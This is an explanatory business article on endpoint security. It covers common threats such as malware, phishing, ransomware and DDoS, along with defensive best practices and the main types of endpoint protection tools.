Endpoint Security: Eliminate Threats and Improve Visibility and Protection

Why is endpoint security vital?

Traditionally, all business computers, servers and printers were hard wired to the office network and operated within the perimeter. Now, with work from home (WFH), bring your own device (BYOD) and growing mobility trends, workers can access their office applications on a growing number of devices inside and outside the perimeter.

Highlighting the scope of the problem, extensive research in 2020’s The Third Annual Study on the State of Endpoint Security Risk showed that some 68% of respondents had witnessed one or more successful endpoint-based attacks on their network. This figure is up from 54% in 2017’s report, highlighting how both the volume of threats and the move to remote and hybrid working environments creates more opportunities for cybercriminals.

The same report reveals 73% of respondents indicate that “new and unknown threats” against their organizations have significantly increased, but only 44% have ample resources to deal with them, and only 27% find traditional antivirus solutions can stop these attacks.

All of this points to the need for modern endpoint solutions to combat the growing frequency of attacks, with successful intrusions now approaching $9 million in costs for enterprises (and potentially destroying smaller businesses entirely).

Every industry will be aware of stories of such devastating attacks. This timeline from the financial sector highlights their growing volume, including examples of breaches, leaks and ransomware cases.

How does endpoint protection work?

Having established the critical need for endpoint protection and its value in the workplace, end users need to understand how endpoint protection functions. However, IT wouldn’t be IT without a myriad of terms and jargon that can overlap.

Endpoint protection platforms work at the basic level by inspecting any passing data from a worker’s device to the network for suspicious activity.

These solutions can scan for viruses and malware while providing firewall tools and web filtering to protect workers and businesses. They also monitor passing data, which can include emails, document files, network access requests, updates, password change requests and other items. All of these are assessed and anything suspicious is reported to the dashboard for inspection.

Endpoint protection is managed through a series of rules or policies to automatically block suspicious behavior. Those rules can be automatically updated and changed as new threats emerge. And, with the possibility of endpoint protections identifying false positives, IT operators can create custom rules to allow exceptions for some activities.

Similarly, trusted devices that belong to the business might have different rules to “guest” BYOD devices to protect against the unwanted digital baggage that workers may bring in on their personal computers, phones or tablets. That could include legitimate apps that have some semi-legitimate but hidden spyware, malware-laden novelty apps or “fake” security apps that are actually malware.

Endpoint solutions can be on-premises, hybrid or in the cloud, depending on the business operating model and its security needs. Cloud solutions, as with other types of software, are ideal for most businesses, reducing the need for in-house resources and providing continuous monitoring along with automated updates and backups. Much of this activity is automated, enabling IT professionals to focus on critical issues.

The biggest and most persistent endpoint security risks

Here are six of the biggest endpoint security risks all businesses will likely come across:

1. Malware

One of the most common threats, malware can hide within any application, update file or document. The most common method of spreading malware is when sent through an “urgent” phishing email, with 96% of attacks sent by this method.

While most are obvious scams, phishing attempts are becoming increasingly sophisticated, with criminals creating emails that look official with typical business reasons given to open the attachment, making them the most common way for malware to spread.

And, as hacking techniques evolve, fileless malware is on the rise, making it even easier for digital criminals to break into networks and access services. This approach leaves fewer breadcrumbs or even no trail at all, making it harder to react to and resolve. 

2. Phishing

While phishing is the common source of malware, it’s also used for other types of attack. Phishing emails can be highly focused, asking employees or specific members of an accounts or finance team to directly transfer funds as part of an urgent project, or to share a password, personal details or other useful information.

Statistics show there are 3.4 billion phishing emails sent daily, and while many of them end up in the spam bin, it only takes one to hit a user’s folder at the wrong moment for them to trigger a destructive or disruptive chain of events. Spear phishing is the more targeted variant of phishing attacks, targeting specific individuals with a convincing series of messages to get them to divulge useful information or take a particular course of action.

3. Ransomware

The most feared type of business disruption, ransomware can see a company’s vital data files all encrypted and held for a sizeable digital ransom, usually in Bitcoin. Research shows there were some 700 million ransomware attacks in 2021 detected by just one security solution, approaching 10 attacks per company each business day.

Businesses large and small have been crippled by ransomware demands, and even those that pay up (frequently in the millions of dollars), often don’t get their data back as the criminals vanish. All a business can realistically do is prevent the files from arriving through endpoint security and ensure they have up-to-date backups and a disaster recovery plan in place to get back to work as quickly as possible.

4. Denial of Service attacks

Usually targeted at larger businesses or visible digital brands including banks, retailers and service providers, Distributed Denial of Service (DDoS) attacks see the attacker overwhelm a business or public-facing network, crashing it or locking legitimate users out. 

Attacks are launched by thousands or millions of bots on compromised devices spread across the internet, making them hard to fight. Taking down the command and control nodes is the primary way to stop them, requiring security professionals to understand what is happening and take action.

DDoS attacks used to be limited and, while annoying, only had a short-term impact. In the 2020s, however, attacks are longer lasting and more focused, and with hackers employing more adaptive DDoS techniques, these attacks are becoming much tougher to shut down. Attacks were up 11% in the first half of 2021, with growth continuing.

To defend against attacks, businesses can employ bot detection methods and tools that can be used to trace a DDoS attack, while tools are available to limit the damage they cause and ensure services remain accessible. 

5. Data loss

Many companies’ most valuable asset is their data. Hackers will go to great lengths to access, steal or delete it to cause business damage. That can be as part of ransomware, blackmail or espionage efforts.

Causing data loss through direct attacks, social engineering is a relatively long-term effort, with some hackers hiding inside a network for months seeking valuable information and waiting for a key moment to act.

6. End users

For all the technology and digital defenses businesses can access, the no. 1 weak point in any system is its users. According to IBM data, human error is the cause of 95% of hacking attacks.

Hackers rely on a person to trigger most of their attacks, so as well as spending on digital defense, all businesses should invest in training and awareness to ensure workers don’t trigger malware or click on the wrong link.

Creating guidelines that are reinforced through live testing and exercises are all key to protecting both users and the business from these attacks. On top of this, mandating strong passwords or phrases, backed up by multi-factor authentication, is key to keeping them and the services they use safe.

Endpoint security best practices

To protect the business against these risks and other emerging threats, security professionals need to use the right endpoint solutions and adopt best practices that ensure scalable and flexible protection.

1.  Least privilege access

When setting up the digital services across your business, it’s best practice to keep track of who has access to what applications. Providing least privilege access means that, for example, only those in accounts or management can access financial applications, while only those in sales or support can access files with customer information.

For some applications, users should only be allowed read access, and when it comes to business critical applications, all users should require multi-factor authentication to access or make changes. Privileged Account Management (PAM) solutions ensure that people who move departments or leave the company lose the access to applications they no longer need.

2. Provide employee training

As mentioned, employees are often the weakest link in cybersecurity, especially as all workers will likely have access to some type of IT device. Providing security awareness training as part of onboarding in how to identify risks and when to report concerns is key. This, along with regular live refreshers through tests and quizzes, can help reinforce the best practices that all workers should follow.

IT applications should ensure that users create strong passwords or phrases on day one which are regularly updated to improve protection. On top of this, all OS, application and security updates should be automatically installed. Ultimately, educating employees is better than leaving the risk management to technology alone. 

3. Multi-factor authentication (MFA)

Along with stronger passwords, workers should also be required to provide multi-factor authentication when accessing business critical applications. Using mobile applications like Authenticator or SMS alerts can create another layer of security linked to a secondary device and beyond the usual email address.

4. Network segmentation

Enterprises are already big users of segmented networks, while companies adopting various cloud services also benefit from segmented services. By separating networks and data, a business can keep key sources such as customer information, corporate data or financial records and valuable intellectual property away from the general network, so that if there is a breach, these files remain secure.

Each segmented network has its own microperimeter, allowing IT to create stricter access rules and even use different endpoint security tools to help defend each network.

5. Endpoint scans

When a device or endpoint tries to connect to the network, techniques like endpoint scanning can be used to ensure the validity of the device. Endpoint scanning can query the device to make sure it has access rights to the network and ensure that it’s patched and has the latest or valid security applications.

While this protects the business, it can also highlight users who have disabled key apps or tried to use non-authorized software on their device.

6.  Secure and encrypt your endpoints

As part of the endpoint security process, a key element is deeper securing and encryption of those endpoints. Endpoint encryption helps security by adding another layer of protection for data moving between networks and devices.

Also, endpoint tools can protect the operating system from hacker attacks. Common criminal tools such as network monitors or keyloggers are used to see what passwords people type and other security risks. These can be identified and disabled by the endpoint tools to protect users and the business.

7. Utilize security information and event management tools

A growing part of IT security is the rise in Security Information and Event Management(SIEM) tools. For large enterprises or data-heavy businesses, these monitor the entire network and collect metrics and data on any events that are suspicious.

SIEM tools help to automate processes and make sense of the massive amounts of complex reporting data to identify and prevent security breaches and reduce the impact of any intrusion or attack.

8. Bring your own device

When it comes to BYOD, the business can save a fortune on device costs, but finds itself at risk from whatever extra applications users might have on them. To protect the business, IT should enforce a set of basic security policies for all devices, along with an acceptable use policy so that people don’t use them for dubious purposes.

That might include mining cryptocurrencies, which might seem legitimate but is a common source of malware. Mobile Device Management software can be installed on iOS and Android devices to ensure they comply with such rules. Having a clear policy for all staff, and ensuring that workers who leave delete any work-related applications or data, is key to protecting the business.

9. Automated patching

Most cloud applications automatically update, but if a business has on-premises or hybrid solutions in place, the value from automated patching and updates mostly outweighs the need to wait and see if there’s an issue with an update.

For security applications, this is critical, as they’re updated daily with the latest threats, and if a zero-day threat is identified, an emergency patch can mitigate it. For business critical applications, IT might want to test an update or patch before rolling it out across the company, especially for legacy systems, but for modern applications there are fewer reasons to delay.

What to look for in an endpoint security solution?

Businesses value automation and ease of use in all applications, especially as remote work and BYOD increases. Features like continuous monitoring, automated alerts and response and integrated threat management are all key features to look for in an endpoint security solution.

The different types of endpoint protection

There are around a dozen different types of endpoint security protection, with more being added as new types of threat appear. Some will be bundled or integrated into a single service or application, simplifying the buying and adoption process, while others are more specialist.

1. Next-generation antivirus

Traditional antivirus solutions alone don’t guarantee protection for the business and its network. Large enterprises with more widespread endpoints are vulnerable to a whole range of risks that virus solutions do not protect from.

Next-generation AV solutions have a broader feature set and make use of AI and machine learning algorithms to detect new threats on the fly, with cloud-based analytics helping support anomaly detection.

These systems can help identify threats that are overlooked by traditional systems, protecting endpoints while being easier to maintain, install and update compared to legacy systems.

However, antivirus isn’t a complete endpoint solution; endpoint tools can work in conjunction and monitor all network endpoints in real time for analysis to identify threat patterns, no matter where the workers are located. Therefore, endpoint security requires next-generation antivirus as part of the integrated solution, but that’s only one facet of total defense.

2. Endpoint Detection and Response (EDR)

Since antivirus tools won’t stop all threats, endpoint visibility is required to help IT identify the threats that might slip past them. Endpoint detection and response helps automatically investigate suspicious activities across hosts and endpoints.

EDR adds smarter capabilities for the business to help protect data and services, while helping block advanced threats and attacks.

3. Endpoint encryption

Your data is no good to a criminal if it’s encrypted, which is why more businesses are adopting end-to-end encryption across all services and endpoint devices to protect files and information. There are various types of encryption, suitable for different use cases, and understanding where each endpoint, application or service applies that encryption is a key part of ensuring a business is defended.

4. Network access control

Firewalls used to be considered enough to protect a business network, but in the current landscape, next-generation firewalls need to work with endpoint security to provide a layered defense.

Some endpoint security tools come with their own firewalls, but provide their own level of protection for the endpoint and support compliance through rules and regulations beyond those a traditional firewall offers.

However, as firewalls often act as the first line of defense for networks in the event of a cyberattack, ensuring they’re properly configured is a must for security professionals.

5. Secure email gateways

Email is still the primary method of business communication, but also criminals and hackers looking to gain access to networks. Growing sophistication in email phishing and other attacks require secure email gateways to address the risk. Secure gateways can quarantine dubious emails before they arrive in a user’s inbox, reducing the risk of compromise and attack.

6. Application control

We’ve already discussed why BYOD increases risk through the use of unapproved applications. Application control is a facet of endpoint security that can prevent such applications being installed or launched.

While application control may primarily stop users playing games, it can prevent the endless series of fake security, social media and other applications from being installed, which come with their own malware payloads or create ways for hackers to download more malicious tools.

7. Insider threat prevention

While much of this article is focused on external business threats, there remains the risk that an insider might try to steal data or install malware deliberately to target the business. This risk grows as contractors, third-parties and partner businesses gain access to your services.

Insider threat prevention requires technical features like app blocking and preventing access to critical data, but also demands adaptive changes to networks and services as users come and go, as well a culture of risk prevention that stops people sharing information casually.

8. Data loss prevention

Endpoint security tools for data loss prevention help secure files against incoming threats. Using rules and processes helps files from ending up in the wrong hands and then can stop files being sent beyond endpoints.

As legislation such as GDPR, HIPAA and PCI-DSS guide how business data should be protected, following their advice reduces the risk of fines or trials if businesses do become the victim of data loss. 

9. Cloud perimeter security

As the network perimeter changes in the cloud era, businesses need additional security to ensure that perimeter remains secure, even as it evolves. Tools such as identity and access management can ensure that only valid users can cross the perimeter, while WAN and VPN tools become increasingly common methods of accessing the network.

10. URL filtering

A feature of most firewalls, URL filters check the websites users try to access against a whitelist of approved sites. Preventing employees from accessing sites where malware or other unwanted information might reside is a useful part of endpoint protection to keep users, devices and their data secure.

Think beyond the endpoint with threat intelligence

The wide array of tools mentioned above increasingly come with a degree of threat and artificial intelligence built in to simplify the monitoring and reporting process. These help overcome the gaps in current endpoint threat prevention through next-gen antivirus and visibility tools (such as EDR), which are critical in identifying threats.

Businesses need to understand the benefits of these intelligence tools, their weaknesses and how they integrate with other features to build an endpoint security strategy that’s strong in threat hunting and identification.

Features such as hypothesis-driven investigations and indicators of attack can help the business identify risk, pre-empt attacks or realize that it’s under attack earlier than ever before.

This is just as well – as AI becomes smarter and a more common feature of all security tools – criminals are also starting to use AI to create smarter ways to attack networks, endpoints and businesses.

Final thoughts

In the never-ending battle between businesses and criminals, a wide range of protection across networks and endpoints is stronger than reliance on a couple of traditional tools. Being able to detect, analyze and block threats quickly could be the difference between a hectic few hours and total business failure.

While it might take some effort to build the best endpoint security, starting now and deploying fast is better than leaving it to a traditional RFP and query process. Fortunately, there are many tools and suites available that provide best-of-breed protection that will secure any business today and help them build a flexible defense for their digital future.

Further reading:

• 5 Firewall Management Challenges and How to Solve Them
• A Guide to Replacing Antivirus with Advanced Endpoint Security
• Endpoint Security Buyers Guide